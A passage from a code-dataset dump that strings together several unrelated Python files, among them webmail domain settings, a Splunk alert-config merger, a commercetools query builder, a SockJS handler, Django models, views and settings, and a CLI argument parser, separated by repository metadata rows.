    #(u"cf_limit_attach_size", u"WebMail单附件大小"),
    (u"cf_def_mailbox_size", _(u"用户邮箱默认容量")),
    (u"cf_def_netdisk_size", _(u"网络硬盘默认容量")),
    (u"limit_send", _(u"发信功能限制")),
    (u"limit_recv", _(u"收信功能限制")),
)
DOMAIN_LIST_PARAMS_VALUE = (
    (u"cf_limit_mailbox_cnt", u"8000"),
    (u"cf_limit_mailbox_size", u"0"),
    (u"cf_limit_netdisk_size", u"500"),
    (u"cf_limit_email_size", u"0"),
    #(u"cf_limit_attach_size", u"10"),
    (u"cf_def_mailbox_size", u"100"),
    (u"cf_def_netdisk_size", u"100"),
    (u"limit_send", u"-1"),
    (u"limit_recv", u"-1"),
)
DOMAIN_LIST_PARAMS_TYPE = (
    (u"cf_limit_mailbox_cnt", u"system"),
    (u"cf_limit_mailbox_size", u"system"),
    (u"cf_limit_netdisk_size", u"system"),
    (u"cf_limit_email_size", u"system"),
    #(u"cf_limit_attach_size", u"system"),
    (u"cf_def_mailbox_size", u"system"),
    (u"cf_def_netdisk_size", u"system"),
    (u"limit_send", u"system"),
    (u"limit_recv", u"system"),
)
# --- Basic web UI settings (title, ICP footer, login behavior) ---
DOMAIN_WEB_BASIC_PARAMS = (
    (u"cf_title", _(u"页面标题")),
    (u"cf_login_page", _(u"登录页面自动输入域名")),
    (u"sw_icp_show", _(u"ICP 备案是否显示")),
    (u"cf_icp_number", _(u"ICP 备案号")),
    (u"cf_icp_url", _(u"ICP 备案链接地址")),
    (u"cf_faq_url", _(u"帮助文件地址")),
    (u"sw_unique_login", _(u"登录系统地点限制")),
    #(u"sw_login_captcha_error_num", u"启用验证码功能"),
    (u"cf_logout_url", _(u"登出跳转地址")),
    (u"sw_login_ssl", _(u"SSL访问")),
)
DOMAIN_WEB_BASIC_VALUE = (
    (u"cf_title", u""),
    (u"cf_login_page", u"default"),
    (u"sw_icp_show", u"-1"),
    (u"cf_icp_number", u""),
    (u"cf_icp_url", u""),
    (u"cf_faq_url", u"http://www.comingchina.com/html/faq/"),
    (u"sw_unique_login", u"-1"),
    #(u"sw_login_captcha_error_num", u"-1"),
    (u"cf_logout_url", u""),
    (u"sw_login_ssl", u"-1"),
)
DOMAIN_WEB_BASIC_TYPE = (
    (u"cf_title", u"webmail"),
    (u"cf_login_page", u"webmail"),
    (u"sw_icp_show", u"webmail"),
    (u"cf_icp_number", u"webmail"),
    (u"cf_icp_url", u"webmail"),
    (u"cf_faq_url", u"webmail"),
    (u"sw_unique_login", u"webmail"),
    (u"sw_login_ssl", u"webmail"),
    #(u"sw_login_captcha_error_num", u"webmail"),
    (u"cf_logout_url", u"webmail"),
)
# --- System announcement ---
DOMAIN_WEB_ANOUNCE_PARAMS = (
    (u"cf_announce_set", _(u"设置系统公告")),
    (u"cf_announce", _(u"系统公告")),
)
DOMAIN_WEB_ANOUNCE_VALUE = (
    (u"cf_announce_set", u""),
    (u"cf_announce", u""),
)
# NOTE(review): name is missing the "T" ("_YPE" instead of "_TYPE"); fixing
# the typo would break any importer referencing it, so it is only flagged.
DOMAIN_WEB_ANOUNCE_YPE = (
    (u"cf_announce_set", u"webmail"),
    (u"cf_announce", u"webmail"),
)
# --- Logos ---
DOMAIN_LOGO_PARAMS = (
    (u"cf_webmail_logo", _(u"Webmail Logo 设置")),
    (u"cf_login_logo", _(u"登录页面 Logo 设置")),
)
DOMAIN_LOGO_VALUE = (
    (u"cf_webmail_logo", u""),
    (u"cf_login_logo", u""),
)
DOMAIN_LOGO_TYPE = (
    (u"cf_webmail_logo", u"webmail"),
    (u"cf_login_logo", u"webmail"),
)
# Available login-page templates (template id -> display name).
DOMAIN_LOGIN_TEMP_LIST = (
    (u"default", _(u"默认")),
    (u"manual", _(u"手动域名")),
    (u"adlogin", _(u"广告风格")),
    (u"gao", _(u"大气管理员")),
    (u"test", _(u"轮播图")),
    (u"center", _(u"登录框居中")),
    (u"sanya", _(u"背景图风格")),
)
# --- Page advertisement / homepage link blobs (new webmail only) ---
DOMAIN_WEB_AD_PARAMS = (
    #(u"cf_adsetting", u"页面广告设置"), # legacy webmail
    (u"cf_adsetting2", _(u"页面广告设置")), # new webmail
)
DOMAIN_WEB_AD_VALUE = (
    (u"cf_adsetting2", u""),
)
DOMAIN_WEB_AD_TYPE = (
    (u"cf_adsetting2", u"webmail"),
)
DOMAIN_WEB_LINK_PARAMS = (
    #(u"cf_webmail_link", u"首页链接设置"), # legacy webmail
    (u"cf_webmail_link2", _(u"首页链接设置")), # new webmail
)
DOMAIN_WEB_LINK_VALUE = (
    (u"cf_webmail_link2", u""),
)
DOMAIN_WEB_LINK_TYPE = (
    (u"cf_webmail_link2", u"webmail"),
)
| 28.107884 | 566 | 0.602057 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 14,909 | 0.65065 |
eab2e9ef32b15fbfe01bae24b376302a8a7522ba | 3,924 | py | Python | splunk_add_on_ucc_framework/modular_alert_builder/build_core/alert_actions_merge.py | livehybrid/addonfactory-ucc-generator | 421c4f9cfb279f02fa8927cc7cf21f4ce48e7af5 | [
"Apache-2.0"
] | null | null | null | splunk_add_on_ucc_framework/modular_alert_builder/build_core/alert_actions_merge.py | livehybrid/addonfactory-ucc-generator | 421c4f9cfb279f02fa8927cc7cf21f4ce48e7af5 | [
"Apache-2.0"
] | null | null | null | splunk_add_on_ucc_framework/modular_alert_builder/build_core/alert_actions_merge.py | livehybrid/addonfactory-ucc-generator | 421c4f9cfb279f02fa8927cc7cf21f4ce48e7af5 | [
"Apache-2.0"
] | null | null | null | # SPDX-FileCopyrightText: 2020 2020
#
# SPDX-License-Identifier: Apache-2.0
from __future__ import absolute_import
import os
import os.path as op
from os.path import dirname as dn
from os.path import basename as bn
from shutil import copy
from . import alert_actions_exceptions as aae
from . import arf_consts as ac
from splunk_add_on_ucc_framework.alert_utils.alert_utils_common.conf_parser import TABConfigParser
merge_deny_list = ['default.meta', 'README.txt']
merge_mode_config = {
"app.conf": "item_overwrite"
}
def remove_alert_from_conf_file(alert, conf_file, logger):
    """Remove every stanza belonging to *alert* from *conf_file* in place.

    Deletes the stanza named after the alert's short name, plus the
    "<name>_modaction_result" and "eventtype=<name>_modaction_result"
    companion stanzas, then rewrites the file.

    :param alert: dict describing the alert; must contain ac.SHORT_NAME.
    :param conf_file: path to the .conf file to clean.
    :param logger: logger used for progress/diagnostic messages.
    :raises aae.AlertCleaningFormatFailure: if *alert* is not a dict.
    """
    if not alert or not conf_file:
        # Nothing to do; log the (falsy) inputs for traceability and bail.
        logger.info('alert="%s", conf_file="%s"', alert, conf_file)
        return
    if not isinstance(alert, dict):
        msg = 'alert="{}", event="alert is not a dict, don\'t remove anything form file {}"'.format(alert, conf_file)
        raise aae.AlertCleaningFormatFailure(msg)
    parser = TABConfigParser()
    parser.read(conf_file)
    conf_dict = parser.item_dict()
    # Walk a snapshot of the stanzas; remove_section mutates the parser.
    for stanza, key_values in list(conf_dict.items()):
        if stanza == alert[ac.SHORT_NAME] or \
           stanza == alert[ac.SHORT_NAME] + "_modaction_result" or \
           stanza == "eventtype=" + alert[ac.SHORT_NAME] + "_modaction_result":
            logger.info('alert="%s", conf_file="%s", stanza="%s"',
                        alert[ac.SHORT_NAME],
                        conf_file, stanza)
            parser.remove_section(stanza)
    # Persist the cleaned configuration back to the same file.
    with open(conf_file, "w") as cf:
        parser.write(cf)
def merge_conf_file(src_file, dst_file, merge_mode="stanza_overwrite"):
    """Merge the stanzas of *src_file* into *dst_file* in place.

    :param merge_mode:
        "stanza_overwrite" -- a stanza present in src replaces the whole
            stanza in dst;
        "item_overwrite"   -- only the keys present in src are written into
            dst, and a key with an empty value removes that key from dst;
        any other value    -- dst is overwritten wholesale with src.

    Missing src/dst files and files in ``merge_deny_list`` are skipped.
    """
    if not os.path.isfile(src_file):
        return
    if not os.path.isfile(dst_file):
        return
    if bn(src_file) in merge_deny_list:
        return
    sparser = TABConfigParser()
    sparser.read(src_file)
    src_dict = sparser.item_dict()
    parser = TABConfigParser()
    parser.read(dst_file)
    dst_dict = parser.item_dict()
    if merge_mode == "stanza_overwrite":
        for stanza, key_values in list(src_dict.items()):
            if stanza not in dst_dict:
                parser.add_section(stanza)
            else:
                # Drop the existing stanza entirely so only src's keys survive.
                # Fixed: the call previously passed an undefined name `false`
                # as a second argument (NameError at runtime) -- remove_section
                # takes only the section name.
                parser.remove_section(stanza)
                parser.add_section(stanza)
            for k, v in list(key_values.items()):
                parser.set(stanza, k, v)
    elif merge_mode == "item_overwrite":
        for stanza, key_values in list(src_dict.items()):
            if stanza not in dst_dict:
                parser.add_section(stanza)
            for k, v in list(key_values.items()):
                if v:
                    parser.set(stanza, k, v)
                else:
                    # An empty value in src means "delete this key" in dst.
                    parser.remove_option(stanza, k)
    else:
        # overwrite the whole file
        parser.read(src_file)
    with open(dst_file, "w") as df:
        parser.write(df)
def merge(src, dst, no_deny_list=True):
    """Recursively merge directory *src* into directory *dst*.

    ``*.conf`` / ``*.conf.spec`` files present on both sides are merged
    stanza- or item-wise (the mode per filename comes from
    ``merge_mode_config``, defaulting to "stanza_overwrite"); every other
    file is copied. Compiled Python files and, when *no_deny_list* is true,
    files in ``merge_deny_list`` are skipped. Hidden directories are ignored.

    :raises Exception: for entries that are neither files nor directories.
    """
    if op.isfile(src):
        return
    src_files = os.listdir(src)
    dst_files = os.listdir(dst)
    for file in src_files:
        f_path = op.join(src, file)
        if op.isfile(f_path):
            if no_deny_list and file in merge_deny_list:
                continue
            if file.endswith("pyo") or file.endswith("pyc"):
                continue
            if file in dst_files and (file.endswith('.conf') or file.endswith('.conf.spec')):
                # Fixed: look the merge mode up per file. Previously the mode
                # chosen for one file (e.g. app.conf -> item_overwrite) leaked
                # into every file processed after it.
                merge_mode = merge_mode_config.get(file, "stanza_overwrite")
                merge_conf_file(f_path, op.join(dst, file), merge_mode)
            else:
                copy(f_path, dst)
        elif op.isdir(f_path):
            if file.startswith('.'):
                continue
            if file not in dst_files:
                os.makedirs(op.join(dst, file))
            # Fixed: propagate no_deny_list so subdirectories honor the
            # caller's choice instead of silently reverting to the default.
            merge(f_path, op.join(dst, file), no_deny_list)
        else:
            raise Exception("Unsupported file type {}".format(f_path))
| 32.429752 | 117 | 0.605759 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 481 | 0.122579 |
eab304e0038f9d90c7298134d0344c832dc999c1 | 226 | py | Python | authapp/models.py | MSFC-NASA/NasaPD | 5851b63f57d2820f48f579bf71ffa040c23b755e | [
"MIT"
] | null | null | null | authapp/models.py | MSFC-NASA/NasaPD | 5851b63f57d2820f48f579bf71ffa040c23b755e | [
"MIT"
] | null | null | null | authapp/models.py | MSFC-NASA/NasaPD | 5851b63f57d2820f48f579bf71ffa040c23b755e | [
"MIT"
] | 2 | 2021-03-19T16:40:52.000Z | 2021-03-20T13:01:41.000Z | from django.db import models
from django.conf import settings
# Create your models here.
class UserRegistrationModel(models.Model):
    """Registration record tied one-to-one to an auth user account."""

    # Deleting the auth user cascades to (deletes) this record as well.
    # Fixed: the original closing line had dataset statistics columns fused
    # onto it, which made the module unparsable.
    user = models.OneToOneField(
        settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
eab3229dfe3d73f0452d4072e97aba518169d2d1 | 2,499 | py | Python | src/commercetools/predicates.py | mikedingjan/commercetools-python-sdk | 95caec9e72017114c4536e63e19f5283754a3871 | [
"MIT"
] | null | null | null | src/commercetools/predicates.py | mikedingjan/commercetools-python-sdk | 95caec9e72017114c4536e63e19f5283754a3871 | [
"MIT"
] | null | null | null | src/commercetools/predicates.py | mikedingjan/commercetools-python-sdk | 95caec9e72017114c4536e63e19f5283754a3871 | [
"MIT"
] | null | null | null | import json
import typing
from collections.abc import Collection
from decimal import Decimal
from functools import reduce
class QueryPredicate:
    """Builds commercetools query-predicate strings from keyword filters.

    Filter keys use Django-style double-underscore syntax::

        QueryPredicate(price__gte=10)        -> 'price >= 10'
        QueryPredicate(variant__sku="x")     -> 'variant(sku = "x")'

    Predicates combine with ``|`` (OR) and ``&`` (AND).
    """

    AND = "AND"
    OR = "OR"

    # Maps filter suffixes to predicate operators. Tuple values hold the
    # (truthy, falsy) spellings for the unary ``is_defined`` operator.
    _operators = {
        "exact": "=",
        "gte": ">=",
        # Fixed: less-than-or-equal is spelled "<=" in the commercetools
        # predicate grammar; the previous "=<" is not valid syntax there.
        "lte": "<=",
        "lt": "<",
        "gt": ">",
        "is_defined": ("is defined", "is not defined"),
        "contains_all": "contains all",
        "contains_any": "contains any",
    }

    def __init__(self, **filters: str):
        # "_connector" is reserved: it selects how the filters are joined.
        self._connector = filters.pop("_connector", self.AND)
        self._filters = filters

    def __str__(self) -> str:
        result = []
        for key, value in self._filters.items():
            fields = key.split("__")
            # Last segment is the operator unless it is an unknown name,
            # in which case it is a field and the operator defaults to exact.
            operator = fields.pop()
            if operator not in self._operators:
                fields.append(operator)
                operator = "exact"

            lhs = fields.pop()
            val = self._clause(lhs, operator, value)
            fields.append(val)
            # Wrap the clause in the remaining path segments, outermost first:
            # ["variant", 'sku = "x"'] -> 'variant(sku = "x")'.
            result.append(reduce(lambda x, y: f"{y}({x})", fields[::-1]))

        if self._connector == self.OR:
            return " OR ".join(result)
        return " AND ".join(result)

    def __or__(self, other):
        # NOTE(review): merging the raw filter dicts flattens both operands,
        # so duplicate keys overwrite and nested connectors are lost --
        # presumably acceptable for simple predicates; confirm for complex ones.
        data: typing.Dict[str, typing.Any] = {}
        data.update(self._filters)
        data.update(other._filters)
        return self.__class__(**data, _connector=self.OR)

    def __and__(self, other):
        data: typing.Dict[str, typing.Any] = {}
        data.update(self._filters)
        data.update(other._filters)
        return self.__class__(**data, _connector=self.AND)

    def _clause(self, lhs, operator, rhs) -> str:
        """Render a single '<lhs> <op> <rhs>' clause (or nested predicate)."""
        assert operator in self._operators

        # Dicts and predicate instances become nested scopes: lhs(inner).
        if isinstance(rhs, dict):
            rhs = self.__class__(**rhs)
            return "%s(%s)" % (lhs, rhs)
        if isinstance(rhs, self.__class__):
            return "%s(%s)" % (lhs, rhs)

        op = self._operators[operator]
        if isinstance(op, tuple):
            # Unary operator: pick the positive/negative spelling by truthiness.
            return "%s %s" % (lhs, op[0 if rhs else 1])
        else:
            rhs = self._escape_value(rhs)
            return "%s %s %s" % (lhs, op, rhs)

    def _escape_value(self, value) -> str:
        """Serialize *value* for embedding in a predicate string."""
        if isinstance(value, self.__class__):
            return "(%s)" % value
        if isinstance(value, Decimal):
            return str(value)
        # Non-string collections render as a parenthesized, comma-separated
        # list (strings are excluded so they serialize as JSON below).
        if not isinstance(value, str) and isinstance(value, Collection):
            return "(%s)" % (", ".join(self._escape_value(v) for v in value))
        return json.dumps(value)
| 30.108434 | 77 | 0.545818 | 2,374 | 0.94998 | 0 | 0 | 0 | 0 | 0 | 0 | 243 | 0.097239 |
eab4407d8abd439bb29cb8a4260e5cef11df39d1 | 385 | py | Python | accounts/views.py | DipeshYogi/PetsProj | 74ad9cdb1ee959ac81088ced405de52f7d1bc458 | [
"MIT"
] | null | null | null | accounts/views.py | DipeshYogi/PetsProj | 74ad9cdb1ee959ac81088ced405de52f7d1bc458 | [
"MIT"
] | 2 | 2020-06-06T01:28:29.000Z | 2021-06-10T22:39:27.000Z | accounts/views.py | DipeshYogi/PetsProj | 74ad9cdb1ee959ac81088ced405de52f7d1bc458 | [
"MIT"
] | null | null | null | from django.shortcuts import render, redirect
from .forms import UserRegisterForm
def register(request):
    """Show the signup form; on a valid POST create the user and go to login."""
    if request.method != 'POST':
        # Plain page view: present an unbound form.
        return render(request, 'accounts/register.html', {'form': UserRegisterForm()})

    form = UserRegisterForm(request.POST)
    if form.is_valid():
        form.save()
        return redirect('login')
    # Invalid submission: re-render with the bound form so errors display.
    return render(request, 'accounts/register.html', {'form': form})
| 27.5 | 65 | 0.649351 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 43 | 0.111688 |
eab5148279ba7dcb7d46e93c0bb4d1ab9fdcb0d8 | 3,155 | py | Python | thunderpush/handler.py | welingtonsampaio/thunderpush | 9c3fd4bd0c9015cae6d0ad2b3f022680f7c8f4d1 | [
"BSD-3-Clause"
] | null | null | null | thunderpush/handler.py | welingtonsampaio/thunderpush | 9c3fd4bd0c9015cae6d0ad2b3f022680f7c8f4d1 | [
"BSD-3-Clause"
] | null | null | null | thunderpush/handler.py | welingtonsampaio/thunderpush | 9c3fd4bd0c9015cae6d0ad2b3f022680f7c8f4d1 | [
"BSD-3-Clause"
] | null | null | null | import logging
from sockjs.tornado import SockJSConnection
from thunderpush.sortingstation import SortingStation
try:
import simplejson as json
except ImportError:
import json
logger = logging.getLogger()
class ThunderSocketHandler(SockJSConnection):
    """SockJS connection handling the Thunderpush client protocol.

    Clients must send ``CONNECT userid:apikey`` first; afterwards they may
    ``SUBSCRIBE`` / ``UNSUBSCRIBE`` channel lists. ``self.messenger`` is the
    per-API-key messenger; it doubles as the "connected" flag.
    """
    def on_open(self, info):
        logger.debug("New connection opened.")
        # no messenger object yet, client needs issue CONNECT command first
        self.messenger = None
    def on_message(self, msg):
        logger.debug("Got message: %s" % msg)
        self.process_message(msg)
    def on_close(self):
        # Deregister from the messenger only if CONNECT ever succeeded.
        if self.connected:
            self.messenger.unregister_user(self)
            self.messenger = None
        logger.debug("User %s has disconnected."
            % getattr(self, "userid", None))
    def force_disconnect(self):
        # Server-initiated disconnect with a distinct close code.
        self.close(9002, "Server closed the connection (intentionally).")
    def process_message(self, msg):
        """
        We assume that every client message comes in following format:
        COMMAND argument1[:argument2[:argumentX]]
        """
        tokens = msg.split(" ")
        messages = {
            'CONNECT': self.handle_connect,
            'SUBSCRIBE': self.handle_subscribe,
            'UNSUBSCRIBE': self.handle_unsubscribe
        }
        try:
            # KeyError: unknown command; IndexError: missing argument.
            messages[tokens[0]](tokens[1])
        except (KeyError, IndexError):
            logger.warning("Received invalid message: %s." % msg)
    def handle_connect(self, args):
        """Handle 'CONNECT userid:apikey' -- authenticate and register."""
        if self.connected:
            logger.warning("User already connected.")
            return
        try:
            self.userid, self.apikey = args.split(":")
        except ValueError:
            logger.warning("Invalid message syntax.")
            return
        # get singleton instance of SortingStation
        ss = SortingStation.instance()
        # get and store the messenger object for given apikey
        self.messenger = ss.get_messenger_by_apikey(self.apikey)
        if self.messenger:
            self.messenger.register_user(self)
        else:
            self.close(9000, "Invalid API key.")
    def handle_subscribe(self, args):
        """Handle 'SUBSCRIBE ch1[:ch2...]' -- join the listed channels."""
        if not self.connected:
            logger.warning("User not connected.")
            # close the connection, the user issues commands in a wrong order
            self.close(9001, "Subscribing before connecting.")
            return
        # Drop empty entries produced by stray/trailing colons.
        channels = filter(None, args.split(":"))
        for channel in channels:
            self.messenger.subscribe_user_to_channel(self, channel)
    def handle_unsubscribe(self, args):
        """Handle 'UNSUBSCRIBE ch1[:ch2...]' -- leave the listed channels."""
        if not self.connected:
            logger.warning("User not connected.")
            # close the connection, the user issues commands in a wrong order
            # NOTE(review): reuses the "Subscribing..." close message from
            # handle_subscribe -- looks like copy-paste; confirm intended text.
            self.close(9001, "Subscribing before connecting.")
            return
        channels = filter(None, args.split(":"))
        for channel in channels:
            self.messenger.unsubscribe_user_from_channel(self, channel)
    def close(self, code=3000, message="Go away!"):
        # Close the underlying SockJS session with the given code/message.
        self.session.close(code, message)
    @property
    def connected(self):
        # A connection counts as "connected" once CONNECT stored a messenger.
        return bool(self.messenger)
| 28.681818 | 77 | 0.620285 | 2,936 | 0.930586 | 0 | 0 | 70 | 0.022187 | 0 | 0 | 811 | 0.257052 |
eab618833368798afc11263d3fd91477fc371614 | 679 | py | Python | archiv/migrations/0015_auto_20210505_1145.py | acdh-oeaw/mmp | 7ef8f33eafd3a7985328d374130f1cbe31f77df0 | [
"MIT"
] | 2 | 2021-06-02T11:27:54.000Z | 2021-08-25T10:29:04.000Z | archiv/migrations/0015_auto_20210505_1145.py | acdh-oeaw/mmp | 7ef8f33eafd3a7985328d374130f1cbe31f77df0 | [
"MIT"
] | 86 | 2021-01-29T12:31:34.000Z | 2022-03-28T11:41:04.000Z | archiv/migrations/0015_auto_20210505_1145.py | acdh-oeaw/mmp | 7ef8f33eafd3a7985328d374130f1cbe31f77df0 | [
"MIT"
] | null | null | null | # Generated by Django 3.2 on 2021-05-05 11:45
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: adds optional start_date/end_date year fields to Stelle."""
    dependencies = [
        ('archiv', '0014_stelle_ort'),
    ]
    operations = [
        migrations.AddField(
            model_name='stelle',
            name='end_date',
            field=models.PositiveSmallIntegerField(blank=True, help_text="e.g. '1234'", null=True, verbose_name='End Date'),
        ),
        migrations.AddField(
            model_name='stelle',
            name='start_date',
            field=models.PositiveSmallIntegerField(blank=True, help_text="e.g. '300'", null=True, verbose_name='Start Date'),
        ),
    ]
| 28.291667 | 125 | 0.606775 | 588 | 0.865979 | 0 | 0 | 0 | 0 | 0 | 0 | 155 | 0.228277 |
eab67e58469eeb940c1776731bcb51f3cbae8706 | 494 | py | Python | 65-Spam-filter/main.py | PawelZabinski/ocr-code-challenges-files | 24d30de694a00f2190790003778c6d65b8b2554b | [
"MIT"
] | null | null | null | 65-Spam-filter/main.py | PawelZabinski/ocr-code-challenges-files | 24d30de694a00f2190790003778c6d65b8b2554b | [
"MIT"
] | null | null | null | 65-Spam-filter/main.py | PawelZabinski/ocr-code-challenges-files | 24d30de694a00f2190790003778c6d65b8b2554b | [
"MIT"
] | null | null | null | # Spam filter
# Take a list of dishes from a menu and add “spam” to them. See https://en.wikipedia.org/wiki/Spam_(Monty_Python).
def main():
    """Prompt for a dish count and dish names, then print each with " spam" appended."""
    try:
        # Only the int() conversion is expected to fail on bad input.
        dish_count = int(input('Enter number of dishes in menu > '))
    except ValueError:
        # Fixed: a bare `except:` here also swallowed KeyboardInterrupt and
        # SystemExit; only a non-numeric count should produce this message.
        print('Invalid dish count. Please enter a positive integer')
        return

    dishes = [input(f'Enter Dish No.{i + 1} > ') for i in range(dish_count)]
    for dish in dishes:
        print(f'{dish} spam')
# Script entry point. Fixed: the original call line had dataset statistics
# columns fused onto it, which made the module unparsable.
if __name__ == '__main__':
    main()
eab815b0041d2f5d41622dd307fbbd7d3b47885d | 6,816 | py | Python | app/cli.py | Jiyvn/pyautotest | a33281d0a6f6edd9c9c60c1e83e2534436818146 | [
"Apache-2.0"
] | null | null | null | app/cli.py | Jiyvn/pyautotest | a33281d0a6f6edd9c9c60c1e83e2534436818146 | [
"Apache-2.0"
] | null | null | null | app/cli.py | Jiyvn/pyautotest | a33281d0a6f6edd9c9c60c1e83e2534436818146 | [
"Apache-2.0"
] | null | null | null | import argparse
class appOptions:
    """Namespace of command-line flag strings shared by Parser and helpers."""
    show_devices = '--show-devices'
    clean_report = '--clean-report'
    device_config = '--device-config'
    global_config = '--global-config'
    test_case = '--test-case'
    tests_dir = '--tests-dir'
    device = '--device'
    test = '--test'
    service_address = '--service-address'
    bp = '--bp'
    disable_screenshot = '--disable-screenshot'
    output_dir = '--output-dir'
    separate = '--separate'
    allure_report = '--allure-report'
    clean = '--clean'
    log_level = '--pyauto-log-level'
    # log_file = '--pyauto-log-file'
class Parser(object):
    """argparse wrapper that registers all pyautotest command-line options."""
    def __init__(self, parser=None, attach=True):
        # parser: existing ArgumentParser to extend; a new one is created
        # when omitted. attach=False skips option registration.
        self.options = None
        self.parser = parser or argparse.ArgumentParser()
        if attach:
            self.addoption()
    def addoption(self):
        """Register every option group on the underlying parser."""
        self.add_help_option()
        # configuration files
        self.add_config_option()
        # test device
        self.add_device_option()
        # test modules
        self.add_tests_option()
        # logging configuration
        self.add_log_option()
        # output
        self.add_output_option()
        # appium
        self.add_appium_option()
        # testing
        self.add_testing_option()
    def parse_arg(self, op=None):
        # op=None lets argparse fall back to sys.argv.
        self.options = self.parser.parse_args(op)
        return self.options
    def parse_known_args(self, op):
        # Returns (namespace, leftover_args) without failing on extras.
        return self.parser.parse_known_args(op)
    def add_config_option(self):
        # configuration files
        self.parser.add_argument(
            appOptions.device_config,
            type=str,
            help='device configuration file'
        )
        self.parser.add_argument(
            appOptions.global_config,
            type=str,
            help='global configuration file'
        )
        self.parser.add_argument(
            appOptions.test_case,
            type=str,
            help='Test case file'
        )
    def add_device_option(self):
        # Device to run on: "ios"/"android" pick the default device for that
        # platform; when omitted, the "default" device entry is used.
        self.parser.add_argument(
            appOptions.device,
            type=str,
            help='device to test on, such as ios, android, <device>'
        )
    def add_tests_option(self):
        # Test cases (modules) to run: ios/android/...
        self.parser.add_argument(
            appOptions.test,
            nargs='*',
            help='Test case to run, such as: ios, android, <dir>/<test_case.py>'
        )
        self.parser.add_argument(
            appOptions.tests_dir,
            type=str,
            help='Test case to run, such as: ios, android, <dir>/<test_case.py>'
        )
    def add_testing_option(self):
        self.parser.add_argument(
            appOptions.disable_screenshot,
            action='store_true',
            help='Disable device screenshot',
        )
    def add_log_option(self):
        # logging configuration
        self.parser.add_argument(
            appOptions.log_level,
            type=str,
            help='pyautotest log level',
        )
    def add_output_option(self):
        # report
        self.parser.add_argument(
            appOptions.output_dir,
            type=str,
            help='test report directory'
        )
        self.parser.add_argument(
            appOptions.separate,
            action='store_true',
            help='separate report directory each run',
        )
        self.parser.add_argument(
            appOptions.allure_report,
            action='store_true',
            help='generate allure report',
        )
        self.parser.add_argument(
            appOptions.clean,
            action='store_true',
            help='--clean for allure report command',
        )
    def add_appium_option(self):
        # appium
        self.parser.add_argument(
            appOptions.service_address,
            type=str,
            help='Appium service address'
        )
        self.parser.add_argument(
            appOptions.bp,
            type=str,
            help='WebDriverAgent port or Bootstrap port'
        )
    def add_help_option(self):
        self.parser.add_argument(
            appOptions.show_devices,
            action='store_true',
            help='show available devices in device.yml',
        )
        self.parser.add_argument(
            appOptions.clean_report,
            action='store_true',
            help='clean reports, excluding logs',
        )
class pytestOption(object):
    """Registers pyautotest command-line options on a pytest-style parser.

    The *parser* passed in must expose ``addoption(*args, **kwargs)`` (as
    pytest's ``parser`` object does). Each ``add_*_option`` method registers
    one related group of options.

    Fixed: the original final line had dataset statistics columns fused onto
    the closing parenthesis, which made the module unparsable; Chinese
    comments were translated to English.
    """
    def __init__(self, parser):
        self.parser = parser
    def add_config_option(self):
        # configuration files
        self.parser.addoption(
            '--device-config',
            type=str,
            help='device configuration file'
        )
        self.parser.addoption(
            '--global-config',
            type=str,
            help='global configuration file'
        )
        self.parser.addoption(
            '--test-case',
            type=str,
            help='Test case file'
        )
        self.parser.addoption(
            '--data',
            type=str,
            help='Data file'
        )
    def add_device_option(self):
        # Device to run on: "ios"/"android" pick the default device for that
        # platform; when omitted, the "default" device entry is used.
        self.parser.addoption(
            '--device',
            type=str,
            help='device to test on, such as ios, android, <device>'
        )
        self.parser.addoption(
            '--system-port',
            type=str,
            help='android desired capabilities - systemPort'
        )
        self.parser.addoption(
            '--platform',
            type=str,
            help='testing device platform, such as ios/android'
        )
    def add_case_option(self):
        # Test cases (modules) to run: ios/android/bunny/...
        self.parser.addoption(
            '--test',
            type=str,
            help='Test case to run, such as: ios, android, <test_case.py>'
        )
    def add_log_option(self):
        # logging configuration
        self.parser.addoption(
            '--pyauto-log-file',
            type=str,
            help='pyautotest log level',
        )
    def add_output_option(self):
        # report
        self.parser.addoption(
            '--output-dir',
            type=str,
            help='output directory'
        )
    def add_appium_option(self):
        # appium
        self.parser.addoption(
            '--service-address',
            type=str,
            help='Appium server host'
        )
        self.parser.addoption(
            '--port',
            type=str,
            help='Appium server host'
        )
        self.parser.addoption(
            '--bp',
            type=str,
            help='WebDriverAgent Port or Bootstrap Port'
        )
    def add_attachment_option(self):
        self.parser.addoption(
            '--disable-screenshot',
            action='store_true',
            help='Disable screenshot',
        )
eab872d17f230c44c3455fbabfcd5cf55ac7a43f | 20,596 | py | Python | config/settings/base.py | ComputationalMechanics/TopoBank | 3e598d4b98cbffa43764e335f026efcbe7580c8a | [
"MIT"
] | 1 | 2020-06-04T23:18:53.000Z | 2020-06-04T23:18:53.000Z | config/settings/base.py | ComputationalMechanics/TopoBank | 3e598d4b98cbffa43764e335f026efcbe7580c8a | [
"MIT"
] | 168 | 2020-06-02T14:46:45.000Z | 2021-03-19T12:11:07.000Z | config/settings/base.py | ComputationalMechanics/TopoBank | 3e598d4b98cbffa43764e335f026efcbe7580c8a | [
"MIT"
] | null | null | null | """
Base settings to build other settings files upon.
"""
import environ
import topobank
ROOT_DIR = environ.Path(__file__) - 3 # (topobank/config/settings/base.py - 3 = topobank/)
APPS_DIR = ROOT_DIR.path('topobank')
env = environ.Env()
READ_DOT_ENV_FILE = env.bool('DJANGO_READ_DOT_ENV_FILE', default=False)
if READ_DOT_ENV_FILE:
# OS environment variables take precedence over variables from .env
env.read_env(str(ROOT_DIR.path('.env')))
# GENERAL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = env.bool('DJANGO_DEBUG', False)
# Local time zone. Choices are
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# though not all of them may be available with every OS.
# In Windows, this must be set to your system time zone.
TIME_ZONE = 'Europe/Berlin'
# https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = 'en-us'
# https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
# DATABASES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
